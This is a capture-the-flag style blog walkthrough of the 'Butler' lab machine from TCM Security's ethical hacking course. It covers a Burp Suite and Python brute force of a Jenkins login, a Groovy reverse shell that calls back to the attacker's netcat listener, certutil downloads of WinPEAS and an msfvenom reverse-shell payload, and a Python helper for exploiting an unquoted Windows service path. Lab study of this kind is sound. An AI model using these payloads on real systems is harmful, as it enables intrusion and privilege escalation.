Butler walkthrough — How to get admin?

Shadem
5 min readSep 27, 2022


Butler is the fourth vulnerable virtual machine that can be downloaded from the TCM Security website (Practical Ethical Hacking course). Here is how I got admin access on this machine.

Difficulty : Easy / Medium

Scanning / Enumeration

Nmap scan

As usual, let’s begin with an Nmap scan:

sudo nmap -T4 -p- -A -vv 192.168.XX.XX -oN nmap_results

Nmap options reminder :

  • -T4: timing template 4 (aggressive). This is a lab, not a real-life engagement, so a noisy scan is fine.
  • -p-: scan all 65535 TCP ports
  • -A: aggressive scan = OS detection (-O) + version detection (-sV) + default scripts (-sC) + traceroute
  • -vv: very verbose output
  • -oN: save the results in normal format to the given file

Nmap results

Open ports

  • 135 — msrpc
  • 139 — netbios-ssn (SMB)
  • 445 — microsoft-ds (SMB)
  • 5040 — unknown
  • 7680 — pando-pub? (Nmap’s name from its services table; the “?” means version detection could not confirm it)
  • 8080 — http — Jetty 9.4.41.v20210516; the http-robots.txt script also reports a robots.txt
  • 49664–49669 — msrpc

Checking smb

smbclient -L \\\\REMOTE_IP\\

Let’s try with a blank password (just press Enter at the prompt, or add -N)…

Nothing here: no shares we can list anonymously.

Bruteforce and exploit Jenkins

Checking the web site on port 8080

Open a browser and go to http://REMOTE_IP:8080

Here I spent a lot of time trying to find a way past this login prompt. I found the Jenkins version on the error page (v2.289) and checked several exploits, but nothing interesting. I tried some Metasploit modules… and nothing.

The solution is Burp Suite + Intruder + Cluster Bomb:

Bruteforce login with BurpSuite

Intercept the login request and send it to Intruder.

Select the username value, click the Add § button on the right, and do the same for the password.
We mark these two positions so Intruder replaces them with values from wordlists (usernames and passwords).

Then, in the same window, select the Cluster Bomb attack type. It tries every username with every password, which is what we want when both are unknown:

In the Payloads section, select Payload set 1 and add some basic usernames: admin, administrator, user, jenkins, Jenkins.
Do the same for Payload set 2 (the passwords) with Password, password, 123456, jenkins, Jenkins:

Check the results: the “jenkins / jenkins” row has a smaller Length than all the others. A different response size means a different response, so this is the pair to try:

Let’s try these credentials, and that’s it!
Note: even if the credentials are very easy, finding them is not so easy for a beginner… The lesson here is to always try the simplest usernames and passwords before attempting elaborate strategies. Personally, I will apply this tip every time I have to find login access.
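As an added example that is not part of the original post (nor Burp’s own code), here is the same cluster-bomb attack written out in Python so the mechanics are visible: every username is paired with every password, each attempt is recorded as (status, body length, Location header), and the pair whose response shape differs from the majority is the hit. The Jenkins form-login endpoint /j_acegi_security_check, its field names, and the failed-login redirect to /loginError are assumptions about the target, not facts from the post; the sample results are constructed, not captured from Butler. Burp’s Length column counts headers too, which is why a different Location header showed up as a shorter row.

```python
import http.client
import itertools
import urllib.parse
from collections import Counter

# Assumed Jenkins form-login endpoint and field names (not stated on the page).
LOGIN_PATH = "/j_acegi_security_check"

# The two payload sets from the post.
USERNAMES = ["admin", "administrator", "user", "jenkins", "Jenkins"]
PASSWORDS = ["Password", "password", "123456", "jenkins", "Jenkins"]


def cluster_bomb(usernames, passwords):
    """Intruder 'Cluster Bomb': every username paired with every password
    (5 x 5 = 25 requests here). 'Pitchfork' would instead walk both lists
    in lockstep and only try 5 pairs."""
    return list(itertools.product(usernames, passwords))


def login_body(username, password):
    """URL-encoded body of the login POST, with the field names Jenkins'
    sign-in form uses (assumed)."""
    return urllib.parse.urlencode({
        "j_username": username,
        "j_password": password,
        "from": "/",
        "Submit": "Sign in",
    })


def classify(results):
    """results: {(user, pw): (status, body_length, location)}.
    The most common response shape is the 'bad credentials' baseline; any
    attempt that does not match it is returned. This is the Intruder trick
    (sort by Length, look for the odd row) made explicit, and it also keys on
    the Location header, which is what actually changes on a redirect-based
    login."""
    baseline, _ = Counter(results.values()).most_common(1)[0]
    return [creds for creds, shape in results.items() if shape != baseline]


def spray(host, port, usernames, passwords, timeout=5):
    """Live version against a real target. http.client does not follow
    redirects, so the 302 Location (loginError vs. the 'from' page) stays
    visible, exactly as in Intruder."""
    results = {}
    for user, pw in cluster_bomb(usernames, passwords):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("POST", LOGIN_PATH, body=login_body(user, pw),
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        body = resp.read()
        results[(user, pw)] = (resp.status, len(body), resp.getheader("Location", ""))
        conn.close()
    return results


def constructed_results():
    """Constructed stand-in for a real run (not captured from Butler): every
    attempt is redirected to /loginError except jenkins/jenkins, which is
    redirected to the page it came from."""
    results = {}
    for creds in cluster_bomb(USERNAMES, PASSWORDS):
        results[creds] = (302, 0, "http://192.168.XX.XX:8080/loginError")
    results[("jenkins", "jenkins")] = (302, 0, "http://192.168.XX.XX:8080/")
    return results


if __name__ == "__main__":
    print("candidate credentials:", classify(constructed_results()))
```

To use it for real, call spray("192.168.XX.XX", 8080, USERNAMES, PASSWORDS) and pass the returned dictionary to classify(); keep the lists short, since every extra username multiplies the number of requests by the number of passwords.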

Open a new tab in your terminal and type:

nc -lvnp 4444

This listens on port 4444 for the connection back.

Now that our machine is ready, it’s time to do the job on the Jenkins side.

In Jenkins, go to Manage Jenkins:

Scroll down to the Tools and Actions section and click Script Console:

In the Script Console, paste this Groovy code, adapting host (and port, if you changed it) to your machine:

// Groovy reverse shell for the Jenkins Script Console (Java-style payload)
String host = "YOUR_IP_MACHINE";   // attacker IP, where Netcat is listening
int port = 4444;                   // attacker port (nc -lvnp 4444)
String cmd = "cmd.exe";            // shell to spawn on the Windows host
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Pump bytes both ways until the socket closes or cmd.exe exits
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

Then click the Run button.

Wait a few seconds and check your Netcat tab:

Final round: privilege escalation

WinPEAS

First, we upload WinPEAS to the remote machine; the binary can be downloaded from the PEASS-ng GitHub repository.

On your machine, in the directory where the WinPEAS binary is located (winPEASx64.exe, renamed to winpeas.exe below), start a Python web server:

python3 -m http.server 7777

On the Windows machine, go to a writable folder such as C:\Users\Butler\Downloads and enter:

certutil.exe -urlcache -f http://YOUR_IP_MACHINE:7777/winpeas.exe winpeas.exe

Run winpeas.exe. There is a lot of output, but the important part is the section below, the services check, which flags a service binary path that contains spaces and is not wrapped in quotes:

This lets us exploit a weakness called an “Unquoted Service Path”: when the Service Control Manager starts such a service, Windows tries every space-delimited prefix of the path as an executable (C:\Program.exe, C:\Program Files.exe, and so on) before reaching the real binary, so if one of those directories is writable by us, a file with the right name runs with the service’s privileges instead. If you want to learn more (and you should), read this good post.

Exploit the unquoted service path

Generate a payload with msfvenom :

msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP_MACHINE LPORT=6666 -f exe > Wise.exe

Set up a python web server where the Wise.exe file is located :

python3 -m http.server 7777

Now, download the Wise.exe file on the vulnerable machine :

certutil.exe -urlcache -f http://YOUR_IP_MACHINE:7777/Wise.exe Wise.exe

Copy Wise.exe into "C:\Program Files (x86)\Wise\", one of the directories the unquoted path makes Windows search before the real binary, and one we can write to:

copy Wise.exe "C:\Program Files (x86)\Wise\"

Prepare our machine to receive the shell with Netcat on port 6666, the port we specified when we created the payload with msfvenom:

nc -lvnp 6666

Go back to the Windows machine and stop the vulnerable service :

sc stop WiseBootAssistant

We can check if the service is stopped with the following command line :

sc query WiseBootAssistant

Final step, start the service :

sc start WiseBootAssistant

Check the Netcat listener on port 6666 on your machine; once the shell comes back, whoami confirms which account the service runs as. Note that sc start reports error 1053 (our binary never answers the Service Control Manager); that is expected.
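Added example, not from the post: why dropping a file named Wise.exe into C:\Program Files (x86)\Wise\ works. It writes out the candidate executables Windows tries for an unquoted service path, in order, and the directory and file name each one needs. The service path used here is an assumed illustration chosen to be consistent with the post’s copy destination; the post does not reproduce the actual path winPEAS printed, so take the real one from your winPEAS output or from sc qc WiseBootAssistant (BINARY_PATH_NAME). The writability check is meant to be run on the target itself.

```python
import ntpath
import os

# ASSUMED illustration of an unquoted ImagePath; take the real one from
# winPEAS or `sc qc WiseBootAssistant` (BINARY_PATH_NAME).
ASSUMED_IMAGE_PATH = r"C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe"


def needs_quotes(image_path):
    """The condition winPEAS flags: a space in the path and no leading quote.
    (A quoted path may still carry arguments after the closing quote.)"""
    s = image_path.strip()
    return " " in s and not s.startswith('"')


def _with_exe(path):
    """CreateProcess appends .exe when the candidate has no extension."""
    return path if ntpath.splitext(path)[1] else path + ".exe"


def hijack_candidates(image_path):
    """Executables Windows tries, in order, for an unquoted path: the text up
    to each space, then the full path last (assumes ImagePath carries no
    arguments). Every entry before the last is a hijack point if its
    directory is writable by us."""
    s = image_path.strip()
    candidates = []
    idx = s.find(" ")
    while idx != -1:
        candidates.append(_with_exe(s[:idx]))
        idx = s.find(" ", idx + 1)
    candidates.append(_with_exe(s))
    return candidates


def hijack_target(candidate):
    """(directory to write into, file name to give the payload)."""
    return ntpath.dirname(candidate), ntpath.basename(candidate)


def writable_now(candidates):
    """Run on the Windows target: candidates whose directory the current user
    can write to. os.access is a coarse check; confirm with icacls."""
    return [c for c in candidates if os.access(ntpath.dirname(c), os.W_OK)]


if __name__ == "__main__":
    if needs_quotes(ASSUMED_IMAGE_PATH):
        # The last candidate is the real binary, so it is not a hijack point.
        for c in hijack_candidates(ASSUMED_IMAGE_PATH)[:-1]:
            directory, name = hijack_target(c)
            print(f"drop {name} into {directory}")
```

With the assumed path, the third candidate is C:\Program Files (x86)\Wise\Wise.exe, which is exactly the file name given to the msfvenom payload and the directory it was copied into; C:\ is normally not writable by a standard user, which is why the earlier candidates are not used.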

Last words

For me, it was a really good machine and I learned a lot of new stuff here.
Attacking Windows machines is my weak point for the moment, and every tip and piece of advice I can get is very welcome. Once I’m done with the Practical Ethical Hacking course on TCM Security, I will follow the Windows Privilege Escalation course to improve my skills.


Shadem

Working in IT (projects & support) | learning enthusiast | currently on a journey to cybersecurity | top 1% on TryHackMe | Iron motivation